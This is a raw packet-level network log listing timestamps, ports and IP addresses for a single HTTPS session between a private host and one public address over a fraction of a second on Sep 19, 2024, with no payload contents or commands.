Sep 19, 2024 02:41:43.500165939 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.500205040 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.500364065 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.500376940 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.500493050 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.514254093 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.514271975 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.514432907 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.514448881 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.514539003 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.514616966 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.516585112 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.516618013 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.516758919 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.516860008 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.516872883 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.516925097 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.517952919 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.517985106 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.518110991 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.518125057 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.518213034 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.519797087 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.519814968 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.519942045 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.520059109 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.520067930 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.520123005 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.521177053 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.521203995 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.521320105 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.521330118 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.521409988 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.521501064 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.523092031 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.523113012 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.523258924 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.523333073 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.523340940 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.523411989 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.524918079 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.524940968 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.525187969 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.525187969 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.525199890 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.525234938 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.526669025 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.526700974 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.526834011 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.526849031 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.526948929 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.527026892 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.527657986 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.527688026 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.527834892 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.527934074 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.527942896 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.527987957 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.529897928 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.529933929 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.530108929 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.530122042 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.530211926 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.532372952 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.532392025 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.532515049 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.532531023 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.532592058 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.532681942 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.533596039 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.533615112 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.533747911 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.533865929 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.533879995 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.533943892 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.536504030 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.536529064 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.536967993 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.536967993 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.536983013 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.536993027 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.537857056 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.537875891 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.538031101 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.538047075 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.538103104 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.538193941 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.539241076 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.539261103 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.539390087 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.539506912 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.539515018 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.539585114 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.540379047 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.540399075 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.540534019 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.540544033 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.540625095 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.540728092 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.542826891 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.542844057 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.543045044 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.543061018 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.543147087 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.543576956 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.543596983 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.543720007 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.543731928 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.543809891 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.543939114 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.544945955 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.544965982 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.545085907 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.545173883 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.545181990 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.545253038 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.545912027 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.545932055 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.546092987 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.546108961 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.546176910 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.546272993 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.547445059 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.547461987 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.547620058 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.547636032 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.548209906 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.548209906 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.548309088 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.548327923 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.548465014 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.548633099 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.548640013 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.549251080 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.549269915 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.549386978 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.549401045 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.549464941 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.549581051 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.550693989 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.550713062 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.550843954 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.550960064 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.550966978 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.551026106 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.551877975 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.551898003 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.552026033 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.552037001 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.552129984 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.552206993 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.553203106 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.553220987 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.553354025 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.553467989 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.553474903 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.553519964 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.553935051 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.553956032 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.554068089 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.554080009 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.554147005 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.554261923 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.554999113 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.555018902 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.555146933 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.555263996 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.555277109 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.555329084 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.556411982 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.556427956 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.556602955 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.556616068 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.556705952 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.557524920 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.557538033 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.557748079 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.557764053 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.557883978 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.558816910 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.558842897 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.558991909 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.559000969 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.559098005 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.559161901 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.559767008 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.559778929 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.559919119 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.559993982 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.559998989 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.560097933 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.560570955 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.560585022 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.560709953 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.560724020 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.561340094 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.561340094 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.561536074 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.561556101 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.561690092 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.561814070 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.561820984 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.562649965 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.562664986 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.562828064 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.562836885 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.562947989 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.562990904 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.563957930 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.563970089 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.564130068 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.564244032 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.564251900 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.564296961 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.565360069 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.565376043 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.565547943 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.565561056 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.565649986 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.565733910 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.566994905 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.567017078 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.567183971 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.567296028 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.567308903 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.567352057 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.567974091 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.567990065 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.568118095 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.568128109 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.568181992 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.568295002 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.569845915 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.569874048 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.570027113 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.570141077 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.570153952 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.570218086 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.571224928 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.571240902 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.571391106 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.571403027 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.571461916 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.571573973 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.572340965 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.572359085 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.572511911 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.572633028 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.572642088 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.572709084 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.573165894 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.573179007 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.573331118 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.573339939 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.573407888 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.573487997 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.574027061 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.574038029 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.574217081 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.574357986 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.574364901 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.575712919 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.575728893 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.575859070 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.575879097 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.576013088 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.576963902 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.576975107 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.577213049 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.577224970 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.577303886 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.577831030 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.577852011 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.578006029 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.578022003 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.578123093 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.578156948 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.579654932 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.579674959 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.579833984 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.579936981 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.579946995 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.581464052 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.581480026 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.581620932 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.581634998 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.581726074 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.581815958 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.582659960 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.582674026 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.582834005 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.582905054 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.582914114 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.583018064 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.583587885 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.583614111 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.583720922 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.583734989 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.583786011 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.583903074 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.584486008 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.584506035 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.584696054 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.584708929 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.584813118 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.585659027 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.585675955 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.585828066 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.585840940 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.585930109 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.586020947 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.586426020 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.586441040 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.586570024 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.586698055 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.586710930 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.586749077 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.587215900 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.587236881 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.587378979 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.587392092 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.587486029 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.587557077 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.587924957 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.587944984 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.588465929 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.588465929 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.588465929 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.588483095 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.588713884 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.588737011 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.589044094 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.589057922 CEST	443	49842	172.67.143.156	192.168.11.30
